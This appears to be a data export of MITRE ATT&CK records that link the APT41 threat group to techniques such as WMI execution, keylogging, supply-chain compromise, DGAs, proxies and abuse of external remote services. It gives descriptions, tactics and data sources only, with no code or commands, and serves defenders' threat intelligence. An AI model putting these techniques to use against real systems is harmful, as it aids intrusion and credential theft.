description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via [PowerSploit](https://attack.mitre.org/software/S0194).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--f395cb28-5bc0-487e-b679-155ac785b7d9
revoked : False
technique : Windows Management Instrumentation
technique_description : Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(Citation: FireEye WMI 2015)

An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1047
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Network Traffic: Network Connection Creation', 'Process: Process Creation', 'WMI: WMI Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used compromised credentials to log on to other systems.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--0528b64e-e719-44a9-94aa-0576bd9a87ec
revoked : False
technique : Valid Accounts
technique_description : Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.

In some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.(Citation: CISA MFA PrintNightmare)

The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.(Citation: TechNet Credential Theft)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
technique_id : T1078
matrix : mitre-attack
platform : ['Windows', 'Azure AD', 'Office 365', 'SaaS', 'IaaS', 'Linux', 'macOS', 'Google Workspace', 'Containers', 'Network']
data_sources : ['Logon Session: Logon Session Creation', 'User Account: User Account Authentication', 'Logon Session: Logon Session Metadata']
permissions_required : ['User', 'Administrator']
effective_permissions : ['User', 'Administrator']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used a keylogger called GEARSHIFT on a target system.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--f480c10c-6a40-4fc7-9380-c2690c70a599
revoked : False
technique : Keylogging
technique_description : Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems.(Citation: Talos Kimsuky Nov 2021)

Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:

* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
* Reading raw keystroke data from the hardware buffer.
* Windows Registry modifications.
* Custom drivers.
* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='collection'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='credential-access')]
technique_id : T1056.001
matrix : mitre-attack
platform : ['Windows', 'macOS', 'Linux', 'Network']
data_sources : ['Driver: Driver Load', 'Process: OS API Execution', 'Windows Registry: Windows Registry Key Modification']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) gained access to production environments where they could inject malicious code into legitimate, signed files and widely distribute them to end users.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--10d118e8-c421-486f-a56a-bbe1ed621c62
revoked : False
technique : Compromise Software Supply Chain
technique_description : Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.

Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011)  
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
technique_id : T1195.002
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['File: File Metadata']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has used DGAs to change their C2 servers monthly.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--8488f2ee-be97-458c-894b-830add635fa8
revoked : False
technique : Domain Generation Algorithms
technique_description : Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)

DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)

Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1568.002
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Network Traffic: Network Traffic Flow']
permissions_required : ['User']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used a tool called CLASSFON to covertly proxy network communications.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--cb0931f7-4d6c-4f21-95a8-fd9d74ba30e0
revoked : False
technique : Proxy
technique_description : Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.

Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1090
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Network Traffic: Network Traffic Flow', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Connection Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service.(Citation: FireEye APT41 Aug 2019)

relationship_id : relationship--556f8dd8-50e0-4115-9815-c20bfc2b915a
revoked : False
technique : External Remote Services
technique_description : Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)

Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.

Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
technique_id : T1133
matrix : mitre-attack
platform : ['Windows', 'Linux', 'Containers', 'macOS']
data_sources : ['Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Flow', 'Logon Session: Logon Session Metadata', 'Application Log: Application Log Content', 'Network Traffic: Network Traffic Content']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 